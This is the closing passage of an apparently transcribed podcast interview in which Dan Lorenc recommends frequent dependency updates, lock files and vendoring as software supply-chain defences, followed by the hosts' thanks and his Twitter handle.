[33:49] Dan Lorenc: Turn on dependabot and start updating your dependencies as quickly as possible and that one's kind of controversial. I'm going to say it anyway. I think, yeah, update as frequently as possible. Take the small version bumps when you can, because it means when there is a CV found later, it's way easier to update your way out of it than dealing with a year or two's worth of backlog of updating things. That goes against that, if it's not broken, don't fix it philosophy, which I get. I think when you weigh it out, though, just take the updates and roll with them as they come. That's a big one. And then just pay attention to what's in your dependency tree, write it down. Somehow every language, every package manager is a little bit different, but useful lock files. Don't let left pads break you, that kind of thing and vendor stuff where you can use proxies if you have to, depending on the ecosystem, but yeah, insulate yourself as much as possible while taking the updates as fast as possible.

[34:35] Richard: Thank you so much, Dan. It's been a really pleasure to talk to you. I really appreciate you coming on the podcast, everyone that was Dan Lorenc, if you have any questions for him, he has a medium article and he may respond to comments. If not, well, I don't know what to do. Maybe his twitter.

[34:48] Dan Lorenc: Yeah. Twitter works too @lorenc_dan.

[34:52] Richard: Got it. Thanks.

[34:53] Justin: Thanks.